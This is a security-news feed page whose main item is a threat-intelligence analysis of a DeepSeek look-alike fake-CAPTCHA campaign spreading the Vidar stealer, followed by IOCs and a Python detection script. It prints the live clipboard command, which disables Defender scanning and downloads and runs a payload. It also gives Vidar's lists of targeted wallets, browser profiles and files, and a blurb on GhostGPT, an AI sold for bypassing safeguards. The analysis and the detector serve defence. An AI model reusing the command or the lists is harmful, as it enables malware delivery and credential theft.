What Is Cybersecurity Performance Management? | Kovrr
Articles related to cyber risk quantification, cyber risk management, and cyber resilience.
The post What Is Cybersecurity Performance Management? | Kovrr appeared first on Security Boulevard.
It looks like a very sophisticated attack against the Dubai-based exchange Bybit:
Bybit officials disclosed the theft of more than 400,000 ethereum and staked ethereum coins just hours after it occurred. The notification said the digital loot had been stored in a “Multisig Cold Wallet” when, somehow, it was transferred to one of the exchange’s hot wallets. From there, the cryptocurrency was transferred out of Bybit altogether and into wallets controlled by the unknown attackers.
[…]
…a subsequent investigation by Safe found no signs of unauthorized access to its infrastructure, no compromises of other Safe wallets, and no obvious vulnerabilities in the Safe codebase. As investigators continued to dig in, they finally settled on the true cause. Bybit ultimately said that the fraudulent transaction was “manipulated by a sophisticated attack that altered the smart contract logic and masked the signing interface, enabling the attacker to gain control of the ETH Cold Wallet.”...
The post North Korean Hackers Steal $1.5B in Cryptocurrency appeared first on Security Boulevard.
It's been a while since I've shared an update on the work Sonatype is doing in the open source ecosystem, so I'm excited to share an update on a few things we're doing in the space — and how it led to the creation of a new security standard in the Open Source Security Foundation (OpenSSF).
The post Behind the Baseline: Reflecting on the launch of the Open Source Project Security Baseline appeared first on Security Boulevard.
Cary, NC, Feb. 25, 2025, CyberNewswire — INE, the leading provider of networking and cybersecurity training and certifications, today announced its recognition as an enterprise and small business leader in online course providers and cybersecurity professional development, along with …
The post News alert: INE secures spot in G2’s 2025 Top 50 education software rankings first appeared on The Last Watchdog.
GhostGPT is revolutionizing cybercrime by providing hackers with an AI tool that bypasses the ethical guardrails found in mainstream models. Available for as little as $150, it enables even novice attackers to generate malicious code, craft phishing emails, and automate social engineering at scale.
The post GhostGPT: An Uncensored AI Chatbot Empowering Cybercriminals appeared first on Security Boulevard.
Introduction

The rapid rise of generative AI tools has created opportunities and challenges for cybercriminals. In an instant, industries are being reshaped while new attack surfaces are being exposed. The DeepSeek AI chatbot, which launched on January 20, 2025, quickly gained international attention, making it a prime target for abuse. Leveraging a tactic known as brand impersonation, threat actors craft fraudulent websites designed to impersonate DeepSeek and mislead unsuspecting users into divulging sensitive information and/or executing harmful malware. Zscaler ThreatLabz has highlighted concerns about open source generative AI tools, like DeepSeek, being misused by threat actors to enhance exploitation and data theft strategies.

This blog post delves into a DeepSeek-themed malware campaign that abuses the popularity of the name. Alongside brand impersonation, this attack chain demonstrates techniques including clipboard injection to deliver malicious PowerShell commands, the deployment of the Vidar information stealer, and the use of legitimate platforms like Telegram and Steam to conceal command-and-control (C2) communication. We also examine additional look-alike domains designed to lure users into interacting with malicious webpages.

Key Takeaways

- Cybercriminals are leveraging DeepSeek's popularity by creating websites hosted on fake look-alike domains to deceive users and deliver the Vidar information stealer.
- The malware campaign uses a fake CAPTCHA page to conduct clipboard injection, secretly copying a malicious PowerShell command for users to execute.
- It is crucial for organizations to have well-defined policies and security controls governing the use of generative AI models and applications in their environment, for both sanctioned and unsanctioned applications.

DeepSeek Look-Alike Domains

ThreatLabz has identified numerous domains leveraging the popularity of DeepSeek that imitate the official website and affiliated websites. These fraudulent domains are used to facilitate a variety of malicious activities, including cryptocurrency pump-and-dump schemes, fake forums designed to steal user credentials, bogus gift card scams, and counterfeit gambling platforms. Dozens of domains, most of them variations on the name "deepseek" under a wide range of top-level domains, were observed impersonating DeepSeek during our investigation.

Technical Analysis

Attack chain

In this section, we describe an attack chain that abuses the DeepSeek brand to spread malware. The campaign begins with attackers creating a fake domain that impersonates DeepSeek. The website asks visitors to complete a registration process and redirects them to a fake CAPTCHA page. Malicious JavaScript on that page copies a malicious PowerShell command to the user's clipboard and prompts them to execute it. If the user runs the PowerShell command, a packed Vidar executable (1.exe) is downloaded and executed.

An overview of the attack chain is shown below:

Figure 1: A diagram illustrating the attack chain employed in this campaign, which leveraged a look-alike domain and DeepSeek's branding to deceive users.

1. Domain setup

ThreatLabz examined a suspicious look-alike domain called deepseekcaptcha[.]top. The domain is designed to impersonate the DeepSeek brand through a webpage that urges users to complete a "verification" process. The webpage can be seen below:

Figure 2: Example webpage impersonating the DeepSeek brand to spread malware.

A WHOIS lookup reveals that the domain is relatively new, registered on January 31, 2025, shortly after the launch of the DeepSeek chatbot. Newly registered domains are often a red flag for malicious activity, particularly as ThreatLabz observed a 400%+ increase in encrypted attacks leveraging newly registered domains last year. This timing strongly suggests that the threat actors behind the website are attempting to capitalize on the widespread attention and impact DeepSeek has generated across various sectors.

2. Deceptive verification prompt

The webpage prompts users to complete a partner registration, as shown in the figure below:

Figure 3: The DeepSeek-themed webpage prompting users to complete a fake partner registration.

When the user clicks on the verification button, they are redirected to a fake CAPTCHA page like the one shown in the figure below.

Figure 4: Fake CAPTCHA lure in DeepSeek-themed malware scam.

Once the user clicks on the "I'm not a robot" confirmation, JavaScript on the page automatically copies malicious code to the user's clipboard and prompts them to execute the command in the Windows Run window, as shown in the figure below.

Figure 5: Fake CAPTCHA instructions to dupe a victim into executing malicious code.

3. Malicious clipboard injection

The PowerShell command copied to the clipboard is shown below:

cmd /c "powershell Add-MpPreference -ExclusionPath 'C:\' && timeout 2 && powershell Invoke-WebRequest -Uri 'http://book[.]rollingvideogames[.]com/temp/1.exe' -OutFile '%TEMP%\1.exe' && start %TEMP%\1.exe" # ✅ ''I am not a robot - reCAPTCHA Verification ID: 1212''

The command first adds a Microsoft Defender exclusion for the entire C: drive, waits two seconds, downloads 1.exe into the user's temporary folder, and launches it; the trailing comment makes the pasted text look like a harmless verification string in the Run window. Examining the source code of the verification page reveals the JavaScript responsible for copying the malicious code to the user's clipboard, as shown below.

Figure 6: JavaScript clipboard functions used to copy malicious PowerShell commands to the user's clipboard.

4. Execution of trojan dropper

When executed, the PowerShell command downloads and launches a malicious file (in this case named 1.exe). This file is a packed sample of Vidar.

5. Vidar deployment

Once Vidar is executed on the victim's system, it initiates its primary objective: harvesting sensitive data. This data includes user credentials, cryptocurrency wallet information, browser cookies, and personal files. The malware employs social media platforms, such as Telegram, to conceal its C2 infrastructure.

Payload behavior and targeted data

Vidar extracts data from specific locations within the victim's file system and registry to locate sensitive assets.

Targeting cryptocurrency wallets

Vidar is programmed to search for files and configurations related to major cryptocurrency wallets. When a cryptocurrency wallet is detected on the victim's system, Vidar queries specific registry keys and file paths to exfiltrate sensitive data such as wallet files. For this DeepSeek-related attack, the Vidar sample was configured to target the following browser extensions (mostly cryptocurrency wallets):

MetaMask, TezBox, Leap Cosmos Wallet, TronLink, Goby, MultiversX DeFi Wallet, BinanceChainWallet, RoninWallet, Edge, Frontier Wallet, Yoroi, UniSat Wallet, SafePal, Coinbase, Authenticator, SubWallet - Polkadot, Guarda, GAuth Authenticator, Wallet, iWallet, Tronium, Fluvi Wallet, RoninWallet, Trust Wallet, Glass Wallet - Sui Wallet, NeoLine, Exodus Web3 Wallet, Morphis Wallet, CloverWallet, Braavos, Xverse Wallet, LiqualityWallet, Enkrypt, Compass Wallet for Sei, Terra_Station, OKX Web3 Wallet, HAVAH Wallet, Keplr, Sender, Elli - Sui Wallet, AuroWallet, Hashpack, Venom Wallet, PolymeshWallet, GeroWallet, Pulse Wallet Chromium, ICONex, Pontem Wallet, Magic Eden Wallet, Coin98, Finnie, Backpack Wallet, EVER Wallet, Leap Terra, Tonkeeper Wallet, KardiaChain, Microsoft AutoFill, OpenMask Wallet, Rabby, Bitwarden, SafePal Wallet, Phantom, KeePass Tusk, Bitget Wallet, Oxygen (Atomic), KeePassXC-Browser, TON Wallet, PaliWallet, Rise - Aptos Wallet, MyTonWallet, NamiWallet, Rainbow Wallet, Uniswap Extension, Solflare, Nightly, Alephium Wallet, CyanoWallet, Ecto Wallet, Talisman Wallet, KHC, Coinhub

Targeting browser data

Vidar also actively searches victim systems for browser-related assets, including stored cookies, saved login credentials, and autofill data. The Vidar sample related to the DeepSeek lure was configured to target the browser profile directories shown below:

- \Google\Chrome\User Data
- \Microsoft\Edge Dev\User Data
- \Google\Chrome SxS\User Data
- \360Browser\Browser\User Data
- \Chromium\User Data
- \Tencent\QQBrowser\User Data
- \Vivaldi\User Data
- \CryptoTab Browser\User Data
- \Epic Privacy Browser\User Data
- Opera: \Opera Software\
- \CocCoc\Browser\User Data
- Opera GX: \Opera Software\
- \BraveSoftware\Brave-Browser\User Data
- Opera Crypto: \Opera Software\
- \CentBrowser\User Data
- \Mozilla\Firefox\Profiles
- \Microsoft\Edge\User Data
- \Moonchild Productions\Pale Moon\Profiles
- \Microsoft\Edge SxS\User Data
- \Thunderbird\Profile
- \Microsoft\Edge Beta\User Data

The Vidar C2 server also instructed infected systems to search for the following filenames and extensions:

*wallet*.*, *upbit*.*, *exodus*.*, *seed*.*, *bcex*.*, *metamask*.*, *btc*.*, *bithimb*.*, *myetherwallet*.*, *key*.*, *hitbtc*.*, *electrum*.*, *2fa*.*, *bitflyer*.*, *bitcoin*.*, *crypto*.*, *kucoin*.*, *blockchain*.*, *coin*.*, *huobi*.*, *coinomi*.*, *private*.*, *poloniex*.*, *words*.*, *2fa*.*, *kraken*.*, *meta*.*, *auth*.*, *okex*.*, *mask*.*, *ledger*.*, *binance*.*, *eth*.*, *trezor*.*, *bitfinex*.*, *recovery*.*, *pass*.*, *gdax*.*, *.txt, *wal*.*, *ethereum*.*

Network communication

Vidar exfiltrates stolen data to attacker-controlled servers by communicating with hardcoded endpoints. Vidar abuses legitimate services like Telegram and Steam to provide the location of its C2 infrastructure. In this attack, the malware used the following services to resolve the location of the Vidar C2 infrastructure:

- A publicly accessible Steam community profile (https://steamcommunity[.]com/profiles/76561199825403037).
- A Telegram channel (https://t[.]me/b4cha00).

The following C2 IP addresses are associated with this campaign:

- 77.239.117[.]222
- 95.216.178[.]57
- 95.217.246[.]174

The botnet ID for this Vidar campaign was oomaino5.

Conclusion

The virality of DeepSeek and the speed at which cybercriminals leveraged it to create look-alike domains highlight how precarious AI technology can be. While AI is a wonderful tool for productivity, it also provides threat actors with more opportunities for abuse, particularly through brand impersonation. Additionally, the proliferation of AI enables cybercriminals to launch more sophisticated and effective attacks with improved strategies.

As AI adoption continues to expand, organizations must strengthen their security measures and educate users to recognize and mitigate threats. Zscaler ThreatLabz remains committed to uncovering and combating these threats to protect our customers.

Zscaler Coverage

Zscaler's multilayered cloud security platform detects indicators related to Vidar at various levels. The figure below depicts the Zscaler Cloud Sandbox, showing detection details for Vidar.

Figure 7: Zscaler Cloud Sandbox report for Vidar.

In addition to sandbox detections, Zscaler's multilayered cloud security platform detects indicators associated with Vidar and other related threats, as listed below:

- Win32.Trojan.ClearFake
- JS.Injection.ClearFake
- PS.Downloader.ClearFake
- Win32.PWS.Vidar

Indicators Of Compromise (IOCs)

Indicator | Description
steamcommunity[.]com/profiles/76561199825403037 | Steam profile used to locate Vidar C2 infrastructure.
t[.]me/b4cha00 | Telegram channel used by Vidar to locate C2 infrastructure.
77[.]239[.]117[.]222 | Vidar C2 IP address.
95[.]216[.]178[.]57 | Vidar C2 IP address.
95[.]217[.]246[.]174 | Vidar C2 IP address.
sailiabot[.]com | Vidar C2 domain.
9f680720826812af34cbc66e27e0281f | Packed Vidar sample.
e9a39ed8c569c9e568740e4eb93a6eec | Vidar sample.
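As an added example (not part of the ThreatLabz report or its tooling), the following Python scores process command lines from endpoint telemetry against the traits of the clipboard-injected command described above: the drive-wide Defender exclusion, the download into %TEMP%, the chained execution of the dropped file, and the trailing "I am not a robot" comment. It goes beyond the single command on the page by also scoring a hidden-window variant that uses Start-Process; the hostnames, sample events, domains and trait weights are constructed placeholders.

```python
"""Score Windows process command lines for the ClickFix-style, clipboard-injected
PowerShell one-liner used in the DeepSeek fake-CAPTCHA lure.

Input is a command line as logged by Sysmon Event ID 1 or Security Event 4688
(the script text from PowerShell Event 4104 works the same way). Every trait
adds a weight; a command is flagged only when the total reaches THRESHOLD, so
a lone Defender exclusion added by an administrator does not fire on its own.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# (trait name, pattern, weight); weights are illustrative, tune them to your telemetry
TRAITS = [
    ("cmd_to_powershell", re.compile(r"\bcmd(?:\.exe)?\s+/c\s+[\"']?powershell", re.I), 1),
    ("defender_exclusion", re.compile(r"add-mppreference\s+-exclusionpath", re.I), 3),
    # exclusion of an entire drive root, e.g. -ExclusionPath 'C:\'
    ("drive_root_exclusion", re.compile(r"-exclusionpath\s+['\"]?[a-z]:\\['\"]?(?=[\s&;]|$)", re.I), 1),
    ("web_download", re.compile(r"\b(?:invoke-webrequest|iwr|curl|wget)\b.*-outfile", re.I), 2),
    ("temp_drop", re.compile(r"%temp%|\$env:temp\b|\\appdata\\local\\temp\\", re.I), 1),
    # download chained straight into execution of the dropped file
    ("exec_dropped", re.compile(r"(?:&&|;)\s*(?:start|start-process)\b", re.I), 2),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    # the fake CAPTCHA page appends a "verification" comment so the Run box looks harmless
    ("captcha_comment", re.compile(r"#.*(?:not a robot|recaptcha verification id)", re.I), 4),
]
THRESHOLD = 6


@dataclass
class Verdict:
    host: str
    score: int
    hits: List[str] = field(default_factory=list)
    url: Optional[str] = None           # download URL, for blocking and hunting
    dropped_file: Optional[str] = None  # where the payload landed, for collection

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD


def score_command(host: str, cmdline: str) -> Verdict:
    """Match every trait against one command line and extract the analyst-relevant artifacts."""
    hits = [name for name, rx, _ in TRAITS if rx.search(cmdline)]
    score = sum(w for name, _, w in TRAITS if name in hits)
    url = re.search(r"(https?://[^\s'\"]+)", cmdline, re.I)
    out = re.search(r"-outfile\s+['\"]?([^\s'\";]+)", cmdline, re.I)
    return Verdict(host, score, hits, url.group(1) if url else None, out.group(1) if out else None)


def triage(events: List[Tuple[str, str]]) -> List[Verdict]:
    """Return only the events that cross the threshold, highest score first."""
    verdicts = [score_command(h, c) for h, c in events]
    return sorted((v for v in verdicts if v.suspicious), key=lambda v: -v.score)


# Constructed sample telemetry (hostname, command line); the domains are placeholders, not real IOCs.
SAMPLE_EVENTS = [
    ("WS-0142", r"""cmd /c "powershell Add-MpPreference -ExclusionPath 'C:\' && timeout 2 && powershell Invoke-WebRequest -Uri 'http://lure.example.invalid/temp/1.exe' -OutFile '%TEMP%\1.exe' && start %TEMP%\1.exe" # I am not a robot - reCAPTCHA Verification ID: 1212"""),
    ("WS-0142", r"""powershell -w hidden -c "iwr http://cdn.example.invalid/x.exe -OutFile $env:TEMP\x.exe; Start-Process $env:TEMP\x.exe" """),
    ("SRV-DEV1", r"""powershell Add-MpPreference -ExclusionPath 'C:\Dev\build'"""),
    ("SRV-DEV1", r"""powershell -Command "Invoke-WebRequest -Uri https://updates.example.invalid/agent.msi -OutFile C:\ProgramData\agent.msi" """),
]
```

Running triage(SAMPLE_EVENTS) flags both WS-0142 events and leaves the administrator's narrow Defender exclusion and the plain MSI download on SRV-DEV1 below the threshold.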
The post DeepSeek Lure Using CAPTCHAs To Spread Malware appeared first on Security Boulevard.
At Seceon’s 2025 Q1 Innovation and Certification Days, Seceon’s Bhabani Prasad engaged in a conversation with cybersecurity experts Deeptesh Chandra and German Moreno about the evolving threat landscape and how Seceon’s AI-powered platform is setting new standards in cybersecurity. The discussion explored Seceon’s competitive strengths, AI-driven threat prevention, and the platform’s ability to consolidate multiple
The post Seceon’s AI-Driven Cybersecurity: Insights from Bhabani Prasad, Deeptesh Chandra, and German Moreno appeared first on Seceon Inc.
Author/Presenter: The Magician
Our sincere appreciation to DEF CON, and the Authors/Presenters, for publishing their erudite DEF CON 32 content, originating from the conference's events at the Las Vegas Convention Center and published via the organization's YouTube channel.
The post DEF CON 32 – Doors, Cameras & Mantraps: Oh My! appeared first on Security Boulevard.
2024 was a year of increasing email security risks for businesses. Email is the number one attack vector for cybercriminals, and phishing attacks remain the top threat to email users.
The 2024 Mimecast State of Email & Collaboration Security Report found that among IT leadership:
But do perceived threats match up with actual threats?
Are organizations even using the right tools and mindset when it comes to email security?
The post 5 Essential Email Security Tips for Businesses appeared first on Security Boulevard.
Veriti’s latest research identifies key false positive triggers in cloud environments, their underlying causes, and their impact on businesses. By understanding these issues, security teams can refine their defenses and reduce unnecessary alerts without compromising protection. Two Main Causes of False Positives in Cybersecurity Protections Brute Force and Protocol-Based False Positives False positives often stem […]
The post Are False Positives Killing Your Cloud Security? Veriti Research Reveals appeared first on VERITI.
As organizations grow, so does their infrastructure, often without a well-designed underlying infrastructure to support this growth. At GuidePoint Security […]
The post Untangling AWS Networks with Cloud WAN appeared first on Security Boulevard.
Cary, NC, 25th February 2025, CyberNewsWire
The post INE Secures Spot in G2’s 2025 Top 50 Education Software Rankings appeared first on Security Boulevard.
As data continues to fuel AI’s evolution, the fight for privacy will become more complex and more urgent than ever before.
The post Data Entanglement, AI and Privacy: Why the Law Isn’t Ready appeared first on Security Boulevard.
With risks increasing and regulatory mandates growing in number, many organizations need a unified approach to compliance and security.
The post A Gold Standard for Compliance: Why ISO 27001 is More Relevant Than Ever appeared first on Security Boulevard.
The countdown to compliance is in its final stretch. With the third and final phase of PCI DSS 4.0 requirements taking effect on March 31, 2025, organizations are under increasing pressure to ensure their client-side security measures meet the new requirements. At Imperva, we’re committed to helping our customers navigate these challenges confidently and efficiently. […]
The post How to Comply with PCI DSS 4.0 Requirements 6.4.3 and 11.6.1 appeared first on Blog.
Google Cloud is putting quantum-safe digital signatures into its Key Management Service, the latest step in the cloud giant's plans to adopt post-quantum cryptography across its portfolio to mitigate the security risks that will likely come with the arrival of fault-tolerant quantum computers.
The post Google Cloud Takes Steps to Guard Against Quantum Security Risks appeared first on Security Boulevard.
Get details on Legit's new capabilities that allow AppSec teams to focus on the issues posing real risk.
The post Announcing Legit Context: The Missing Link to True Business-Driven ASPM appeared first on Security Boulevard.
Are You Confident in Your Cloud Security Strategy? How confident are you in your cybersecurity strategy? Today's cyber threats demand a robust and comprehensive approach to securing all aspects of your digital assets. This security extends beyond human users and should include Non-Human Identities (NHIs) too. Understanding Non-Human Identities (NHIs) NHIs, or machine identities, are […]
The post Confident in Your Cloud Security Strategy? appeared first on Entro.
Are You Leveraging the Full Potential of Secrets Management? Ever wondered how to safeguard your digital assets effectively? The answer lies in secrets management. Ensuring security, compliance, and efficiency, it is a pivotal aspect of cybersecurity that deals with the protection of secure credentials, also called Non-Human Identities (NHIs), and their associated secrets. Non-Human Identities: […]
The post Feeling Empowered by Your Secrets Management? appeared first on Entro.
Is Your Organization Truly in Control of its Non-Human Identities? The increasing complexity of cyber interactions has necessitated a shift in our approach to security. One area that is often overlooked in traditional security models is the management of Non-Human Identities (NHIs). This critical aspect of access control plays a crucial role. Now, ask yourself, […]
The post Can You Fully Control Your NHIs? appeared first on Entro.